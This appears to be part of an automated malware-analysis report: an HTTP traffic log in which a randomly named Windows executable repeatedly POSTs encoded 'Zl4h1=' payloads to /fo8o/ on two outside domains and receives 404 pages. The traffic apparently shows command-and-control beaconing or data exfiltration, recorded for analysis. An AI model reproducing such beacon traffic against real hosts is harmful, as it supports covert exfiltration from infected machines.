                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.1149738195.110.124.133806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:40.892910004 CEST817OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.elettrosistemista.zip
                                                    Origin: http://www.elettrosistemista.zip
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 37 57 39 4c 4d 32 56 61 65 37 38 34 48 31 4a 4c 77 74 36 76 72 54 69 5a 71 79 4c 4b 47 4c 79 70 55 3d
                                                    Data Ascii: Zl4h1=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qx7W9LM2Vae784H1JLwt6vrTiZqyLKGLypU=
                                                    Jun 9, 2024 18:01:41.741810083 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:41 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.1149739195.110.124.133806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:43.443393946 CEST1830OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.elettrosistemista.zip
                                                    Origin: http://www.elettrosistemista.zip
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 2f 71 30 53 65 49 71 75 39 59 76 43 4b 61 34 43 35 6f 76 44 76 4d 6e 39 54 72 53 68 71 4f 48 2b 75 48 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 55 52 70 75 4d 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 [TRUNCATED]
                                                    Data Ascii: Zl4h1=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf//q0SeIqu9YvCKa4C5ovDvMn9TrShqOH+uHZ5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHURpuMCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6PPSb476q0i+bu10gTKbeXTHyOaenEfiuVRmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQ4K9w9v/qN+KXZPJUNrbSTjcl0CHC76zVXxuY6wgzGJMRREr9A1TJuKLLjaVAHZhBS1HFnst0RWFnyMLcWMY8zHnXPVVlHGaARFntTU9iJOShkDobbE4bxpzRvrx3smt0iagNxgUkf42LnmXB77IDUvOHKaMw4jHgXDTNYUuMx5g+ZxF88k4BmOuLm7pBmuxaWcfuZbkEjdNsgskBmrlzWxDV2gWk+nTarmpinYncgXqbQpn9VwdLEIOnttC6qdI29Pk1HxAJDpy82osJwl7b0///lasC6eLXP8fUED0Hy2+aXdtZXRQ0bjMOhRYVgzT2dFUJqP+S2/PYOh1vlxbwgPiNEUUxiuhu+eO/eEXt3hnDk6T8j/nIXnpCt2+M4YwZXaqGDZVZbWHZxfsi1Y5DPQ2m5KNYYJR0oN34/yMD/o25olPeOVY9YHBPp8FUz6KQFYNX/3E5uKXdkfbkP75msiDk0HTc1LpVvnfRQgVFLjwMx8sjZDmdjV1KA1w0dgcl8bFsYA1+LCJASEb [TRUNCATED]
                                                    Jun 9, 2024 18:01:44.304589987 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:44 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.1149740195.110.124.133806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:45.972829103 CEST513OUTGET /fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.elettrosistemista.zip
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:01:46.826838017 CEST367INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:46 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.114974123.227.38.74806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:52.330249071 CEST791OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donnavariedades.com
                                                    Origin: http://www.donnavariedades.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.donnavariedades.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 6f 4a 35 73 37 55 72 74 2b 65 78 67 59 66 32 35 63 45 31 39 66 37 4d 49 50 4e 78 2b 55 6b 6c 71 6f 51 3d 3d
                                                    Data Ascii: Zl4h1=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDoJ5s7Urt+exgYf25cE19f7MIPNx+UklqoQ==
                                                    Jun 9, 2024 18:01:53.021562099 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:52 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    Vary: Accept-Encoding
                                                    x-frame-options: DENY
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    x-request-id: a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912
                                                    server-timing: processing;dur=14
                                                    content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912
                                                    x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1
                                                    Content-Encoding: gzip
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sXh2KeFPggnvWIuk4DuHrhCdvCizRRXVrZEHB9oeJ9mw
                                                    Data Raw:
                                                    Data Ascii:
                                                    Jun 9, 2024 18:01:53.021578074 CEST1236INData Raw: 70 6e 4f 58 52 4d 4c 25 32 42 33 31 69 38 47 68 77 31 49 25 32 42 68 4a 6c 66 79 56 37 55 6b 44 43 77 4a 65 48 4f 5a 70 25 32 42 77 31 77 52 63 76 35 61 5a 45 30 44 69 41 61 64 30 37 51 36 25 32 42 70 6d 6f 57 74 73 32 39 59 59 55 52 62 44 63 65
                                                    Data Ascii: pnOXRML%2B31i8Ghw1I%2BhJlfyV7UkDCwJeHOZp%2Bw1wRcv5aZE0DiAad07Q6%2BpmoWts29YYURbDce3VeHkRURvCRngt1h7RQ1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuratio
                                                    Jun 9, 2024 18:01:53.021585941 CEST424INData Raw: 3d 29 79 45 3d 08 9f b9 ac 8b 8a 1d d1 40 3d 04 49 77 0d d0 37 4c 76 06 b0 86 9d 8b 7b c3 19 19 49 ae 10 29 fc 26 34 40 c5 ac 7a 15 72 f8 f3 54 d8 d5 33 09 d5 70 46 0c e4 6a f7 c8 e8 e9 4b fe b0 76 42 b8 bc 92 10 e1 a5 83 a0 35 e9 a1 c0 af 9d c8
                                                    Data Ascii: =)yE=@=Iw7Lv{I)&4@zrT3pFjKvB5oZt:'s0%p~/FYzTvkgLUfHBOnUkGKyjyK5A[4vS=qhZW0hkr}AI}2:Uz[?|+Q}K )rN
                                                    Jun 9, 2024 18:01:53.021595955 CEST413INData Raw: 27 e2 07 9d 80 d3 54 7c f9 3e fb f2 3d 56 29 62 b6 74 e9 5d 3b f1 b8 a0 2e 9b df 39 83 53 a6 bb 5b e7 a6 08 14 0e ff 0e 12 b8 9e 2e dc 78 85 6e ed c8 cf 96 4b 85 0f 3c dc 18 60 5a c0 64 18 28 10 43 8c ed 72 ea c7 8a d5 30 0c 13 00 da 8c 20 88 38
                                                    Data Ascii: 'T|>=V)bt];.9S[.xnK<`Zd(Cr0 8AaZZz6(6W|Ysp!;v"[kE-rI,6UPtt*Uqn>px%("U.>9(dt>y~\aj|T-5<<{nKtG1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.114974223.227.38.74806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:54.865632057 CEST811OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donnavariedades.com
                                                    Origin: http://www.donnavariedades.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.donnavariedades.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 45 4b 62 72 51 4f 64 56 41 6a 7a 52 65 71 67 6e 52 34 2b 43 71 77 69 6e 52 33 44 74 42 46 38 58 55 3d
                                                    Data Ascii: Zl4h1=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoEKbrQOdVAjzReqgnR4+CqwinR3DtBF8XU=
                                                    Jun 9, 2024 18:01:55.553605080 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:55 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    Vary: Accept-Encoding
                                                    x-frame-options: DENY
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    x-request-id: a465852f-406c-4919-a086-9337ee5c2b6a-1717948915
                                                    server-timing: processing;dur=10
                                                    content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a465852f-406c-4919-a086-9337ee5c2b6a-1717948915
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a465852f-406c-4919-a086-9337ee5c2b6a-1717948915
                                                    x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1
                                                    Content-Encoding: gzip
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQfET4ahT70%2B6CXmzMiQ0YdI2xhMj5Qte%2BlNtaPbW
                                                    Data Raw:
                                                    Data Ascii:
                                                    Jun 9, 2024 18:01:55.553647995 CEST342INData Raw: 63 6a 4c 38 65 75 50 46 52 5a 69 69 4a 37 62 45 52 46 4a 79 6d 74 25 32 46 34 67 43 50 48 6b 65 78 37 54 42 42 76 63 4a 63 4d 42 6f 46 72 54 51 49 39 4e 68 4e 42 54 77 46 70 70 77 65 47 64 52 49 48 73 58 55 58 61 39 4f 33 6f 59 63 37 5a 58 77 4d
                                                    Data Ascii: cjL8euPFRZiiJ7bERFJymt%2F4gCPHkex7TBBvcJcMBoFrTQI9NhNBTwFppweGdRIHsXUXa9O3oYc7ZXwMlZuKgYIfW%2BmeBCngkk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuratio
                                                    Jun 9, 2024 18:01:55.553667068 CEST1236INData Raw: 36 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 93 db b6 15 7e f7 af 40 e9 e9 8c d3 e1 1d 14 29 d2 d4 ba ce da 6d 33 b3 69 33 75 66 3a ed 1b 44 42 22 b2 14 c1 82 90 b4 9b 4c fe 7b 0f 00 82 22 77 25 a7 d9 1d 5b b8 9c eb 77 2e 38 da f2 0f 9f
                                                    Data Ascii: 6b9X[~@)m3i3uf:DB"L{"w%[w.8qyho9BJs;op!l ke`&9#A*I>RR${I0>/hEMEG"S5j?yYruwg}d
                                                    Jun 9, 2024 18:01:55.553685904 CEST497INData Raw: 68 ed c7 51 e6 7a a1 bf 5a e7 08 80 ca b2 b5 dd c5 40 13 c6 23 e5 03 ce fc 2c 4d 5d 00 76 95 66 e8 1e af 7d 9c bb e0 70 9a ac 11 dc a5 91 8b 31 64 b6 8f cd ea 01 6e 70 a2 ce ee 43 1f af 81 11 23 d0 82 f3 95 65 0a fd 38 06 09 46 de c3 c2 ac e5 ee
                                                    Data Ascii: hQzZ@#,M]vf}p1dnpC#e8F?N/:sgR\q@=6?qU[xTn0`3.!8cjmVD V U_92X/8VWHot2_+q9-$+


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.114974323.227.38.74806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:01:57.550462008 CEST1824OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donnavariedades.com
                                                    Origin: http://www.donnavariedades.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.donnavariedades.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 52 51 43 66 4b 4b 50 48 77 58 4a 62 49 32 4e 70 45 39 55 32 30 66 38 6a 75 30 70 6e 4e 36 39 58 6d 6d 39 43 77 54 47 4e 4e 75 70 78 35 5a 34 57 55 66 58 41 63 4b 64 48 72 6a 47 36 33 38 2b 63 65 2b 4b 6f 46 79 78 6f 47 72 72 36 67 54 4f 31 47 48 68 32 74 6b 6a 56 71 30 44 51 30 59 68 65 75 55 33 4e 34 6e 61 6d 53 70 6c 57 77 6e 59 76 4d 53 6e 48 54 37 45 64 4b 68 7a 65 4d 44 4b 42 42 59 4f 4b 35 34 43 65 72 78 39 37 49 4e 4c 76 59 37 37 52 4d 50 6b 4d 38 61 34 4e 71 49 66 4a 2b 4c [TRUNCATED]
